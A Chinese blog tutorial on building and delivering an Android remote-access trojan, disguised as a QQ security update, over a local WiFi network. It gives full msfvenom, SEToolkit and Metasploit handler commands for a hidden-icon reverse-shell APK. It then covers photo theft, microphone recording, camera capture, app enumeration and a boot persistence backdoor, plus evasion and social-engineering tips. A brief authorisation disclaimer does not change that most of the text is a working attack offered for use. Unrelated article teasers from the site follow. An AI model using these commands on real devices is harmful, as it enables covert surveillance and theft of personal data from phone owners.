news 2026/2/19 10:44:16

安卓 WiFi 钓鱼渗透测试全流程教程(详细版)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
安卓 WiFi 钓鱼渗透测试全流程教程(详细版)

一、核心目标

通过社会工程学伪装 + WiFi 钓鱼 + 安卓木马远控,模拟真实渗透场景,实现对安卓手机的远程控制,掌握从 “陷阱搭建→诱捕下载→权限突破→持久化控制” 的完整渗透链路。

二、环境准备

1. 硬件 / 系统要求

  • Kali Linux(任意版本,推荐 2023+):需安装metasploit-frameworkapache2setoolkit
  • 安卓手机(靶机):Android 9+(越高版本越贴近真实环境,需关闭纯净模式 / 安装监控);
  • 网络环境:Kali 与手机处于同一局域网(WiFi),Kali IP 固定为10.205.105.150(根据实际修改)。

2. 预装工具检查

bash

运行

# 安装/检查核心工具 apt update && apt install -y metasploit-framework apache2 setoolkit # 启动metasploit数据库(可选,提升稳定性) systemctl start postgresql msfdb init

三、完整操作流程

阶段 1:SEToolkit 构建钓鱼木马(社会工程学伪装)

1. 启动 SEToolkit

bash

运行

setoolkit
2. 选择攻击模式(鱼叉式钓鱼)

bash

运行

1) Social-Engineering Attacks # 社会工程学攻击 1) Spear-Phishing Attack Vectors # 鱼叉式钓鱼 2) Create a FileFormat Payload # 生成文件格式载荷
3. 配置木马参数
  • 选择载荷:2) Android Reverse TCP Meterpreter(安卓反向远控);
  • 监听 IP:直接回车(默认10.205.105.150,Kali 的局域网 IP);
  • 监听端口:直接回车(默认 443,伪装 HTTPS 流量,穿透性强);
  • 重命名木马:选2) Rename the file,输入QQ_Security_Update.apk(伪装成 QQ 安全更新,降低警惕);
  • 退出邮件发送环节:选99) Return to main menu(局域网测试无需邮件)。
4. 定位并迁移木马文件

bash

运行

# 查找生成的木马文件 find /root/.set/ -name "QQ_Security_Update.apk" # 复制到Apache根目录(供手机下载) cp /root/.set/QQ_Security_Update.apk /var/www/html/

阶段 2:修复木马兼容性(解决解析 / 安装报错)

1. 重新生成适配安卓的木马(解决架构不兼容)

SEToolkit 生成的木马可能存在架构问题,手动用msfvenom重构:

bash

运行

msfvenom -p android/meterpreter/reverse_tcp \ LHOST=10.205.105.150 \ LPORT=443 \ -o /var/www/html/QQ_Security_Update.apk \ --platform android \ -a dalvik \ # 安卓专属架构,替代arm(避免兼容性报错) AndroidMeterpreter::Options::HideAppIcon=true \ # 无图标隐蔽性强 --signer-key /usr/share/metasploit-framework/data/android/testkey \ # 加签名,骗过安卓校验 --align 4 # 优化APK结构,避免解析失败
2. 启动 Web 服务(供手机下载)

bash

运行

# 启动Apache并设置开机自启 service apache2 start systemctl enable apache2

阶段 3:Metasploit 启动监听(搭建远控接收端)

bash

运行

# 启动msfconsole(静默模式,无冗余输出) msfconsole -q # 配置监听器 use exploit/multi/handler # 选择多载荷监听器 set PAYLOAD android/meterpreter/reverse_tcp # 与木马载荷一致 set LHOST 0.0.0.0 # 监听所有网卡(避免局域网IP限制) set LPORT 443 # 与木马端口一致 run # 启动监听,等待手机上线

成功标志:终端显示[*] Started reverse TCP handler on 0.0.0.0:443

阶段 4:手机端诱捕下载(社会工程学落地)

1. 手机权限配置(突破安卓安装限制)
  • 打开设置→应用管理→下载用的浏览器(如 Chrome)→权限→开启 “安装应用”;
  • 设置→安全→开启 “未知来源安装”“外部来源应用下载”;
  • 关闭品牌机专属限制:小米 / 华为需关闭 “纯净模式”,vivo/OPPO 关闭 “安装监控”。
2. 手机下载并安装木马
  • 打开浏览器,输入http://10.205.105.150/QQ_Security_Update.apk
  • 下载完成后,通过 “文件管理器→下载文件夹” 手动安装(避免浏览器拦截);
  • 安装时忽略 “风险提示”,点击 “继续安装”(社会工程学关键:让用户误以为是官方更新)。

阶段 5:Meterpreter 远控操作(突破安卓权限限制)

1. 基础验证(确认控制权)

手机安装完成后,Kali 的 msfconsole 会显示:

text

[*] Sending stage (72508 bytes) to 10.205.105.xxx [*] Meterpreter session 1 opened (10.205.105.150:443 -> 10.205.105.xxx:xxxx)

进入meterpreter >提示符,代表控制成功。

2. 核心操作(适配安卓高版本)
功能失效快捷命令替代有效命令(安卓底层 Shell)说明
手机震动vibrateshell → am broadcast -a android.intent.action.VIBRATE调用安卓系统 API,必生效
查看手机信息sysinfoshell → getprop ro.product.model / getprop ro.build.version.release查看型号 / 系统版本,比 sysinfo 更全
查看已装 APPapp_list -ashell → pm list packages | grep -E "wechatqqalipay"筛选微信 / QQ / 支付宝等关键 APP
下载照片无直接命令exit → download /sdcard/DCIM/Camera/[照片名].jpg/root/先退出 shell,下载相册照片到 Kali
截图screenshot重新生成木马时去掉 HideAppIcon=true,启动 APP 后再输 screenshot无图标木马无 UI 权限,有图标木马可截图
摄像头调用webcam_snap同上(需有图标 + 用户授权摄像头)安卓高版本会弹权限提示,实战需社工骗授权
录音record_mic -d 10record_mic -d 10(直接生效)录音文件会保存到 Kali 的 /root 目录,可播放
3. 持久化控制(开机自启后门)

废弃的persistence脚本替代方案:

bash

运行

# 在meterpreter中执行 run post/android/manage/startup_persistence -M broadcast -P 4444 -R 10.205.105.150
  • -M broadcast:注册为安卓开机广播接收器;
  • -P 4444:备用监听端口(避免 443 冲突);
  • -R:Kali 的 IP,手机重启后自动回连。

四、常见问题与解决方案

报错现象原因解决方案
cat: /root/.bash_history: 没有那个文件或目录Kali 新版默认用 zsh,历史记录在.zsh_history改用cat ~/.zsh_history > 文件名.txt或通用命令history > 文件名.txt
cp: 调用 stat 失败:不是目录木马文件路径错误find命令确认真实路径,再复制
解析包出现问题木马架构不兼容msfvenom重新生成,指定-a dalvik
应用未安装安卓签名校验 / 权限不足--signer-key签名,开启浏览器 “安装应用” 权限,关闭纯净模式
screenshot 无返回数据无图标木马无 UI 权限去掉HideAppIcon=true,生成有图标木马并前台运行
persistence 脚本找不到安卓端脚本废弃改用run post/android/manage/startup_persistence

五、实战核心要点

  1. 端口选择:优先用 443(HTTPS),其次 80(HTTP),避免 4444 等特征端口(易被防火墙拦截);
  2. 伪装技巧:木马命名需贴合场景(如 “WiFi 加速器.apk”“系统更新.apk”),降低用户警惕;
  3. 权限突破:安卓 10 + 的隐私权限需通过 “路径读取”(如/data目录)或 root 提权,社工授权是关键;
  4. 隐蔽性平衡:无图标木马隐蔽但功能受限,有图标木马功能全但易被发现,实战按需选择;
  5. 持久化:安卓开机自启后门需结合广播接收器 / 系统服务,避免用户卸载后失去控制。

六、合规声明

本教程仅用于合法授权的渗透测试演练,禁止用于任何未授权的攻击行为。操作前需取得目标设备的明确授权,遵守《网络安全法》等法律法规,违者自负法律责任。


关键复盘

  1. 整个流程核心是 “社会工程学 + 技术伪装”:用 “QQ 安全更新” 骗下载,用 443 端口骗防火墙,用签名骗安卓校验;
  2. 安卓高版本的权限限制是最大卡点,底层 Shell(shell命令)是突破限制的万能入口;
  3. 实战中 “能拿到控制权” 比 “能调用摄像头 / 截图” 更重要,持久化后门是渗透的最终目标。
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/2/17 23:18:52

UI-TARS-desktop效果展示:AI助手如何提升工作效率

UI-TARS-desktop效果展示:AI助手如何提升工作效率 1. 引言:多模态AI代理的效率革命 在现代办公环境中,重复性任务、跨平台操作和信息碎片化已成为影响生产力的主要瓶颈。传统的自动化工具往往依赖于固定的脚本逻辑与API接口,难以…

作者头像 李华
网站建设 2026/2/18 1:54:35

分割一切再进化:SAM3学生优惠套餐详解

分割一切再进化:SAM3学生优惠套餐详解 你有没有想过,只要说一句“把图里的狗都圈出来”,AI就能自动识别并精准分割出画面中所有狗狗的轮廓?这不再是科幻场景。Meta最新发布的SAM3(Segment Anything Model 3&#xff0…

作者头像 李华
网站建设 2026/2/19 9:17:50

5分钟部署Qwen3-4B-Instruct-2507:中小企业AI助手零基础搭建指南

5分钟部署Qwen3-4B-Instruct-2507:中小企业AI助手零基础搭建指南 1. 引言:轻量大模型时代已来 在人工智能加速落地的今天,越来越多中小企业希望引入AI能力提升效率,但高昂的硬件成本、复杂的部署流程和数据安全顾虑成为主要障碍…

作者头像 李华
网站建设 2026/2/17 10:12:29

DeepSeek-R1知识库应用:云端快速搭建,支持私有数据

DeepSeek-R1知识库应用:云端快速搭建,支持私有数据 在企业数字化转型的浪潮中,如何高效管理内部文档、技术资料和业务流程成为一大挑战。员工常常面临“信息找不到、知识难共享”的困境——新员工入职要花几周时间翻阅历史文档,技…

作者头像 李华
网站建设 2026/2/16 13:47:36

AutoGLM-Phone-9B多模态移动端部署实战|基于轻量化GLM架构的高效推理

AutoGLM-Phone-9B多模态移动端部署实战|基于轻量化GLM架构的高效推理 1. 引言:移动端多模态大模型的落地挑战 随着大语言模型在文本生成、对话理解等任务中展现出强大能力,多模态融合成为下一代智能应用的核心方向。然而,在资源…

作者头像 李华
网站建设 2026/2/16 14:12:35

Qwen2.5-0.5B部署案例:在边缘设备实现智能问答

Qwen2.5-0.5B部署案例:在边缘设备实现智能问答 1. 引言 随着大模型技术的快速发展,如何将高性能语言模型部署到资源受限的边缘设备上,成为工业界和开发者关注的核心问题。传统大模型通常需要高配GPU和大量内存,难以在手机、树莓…

作者头像 李华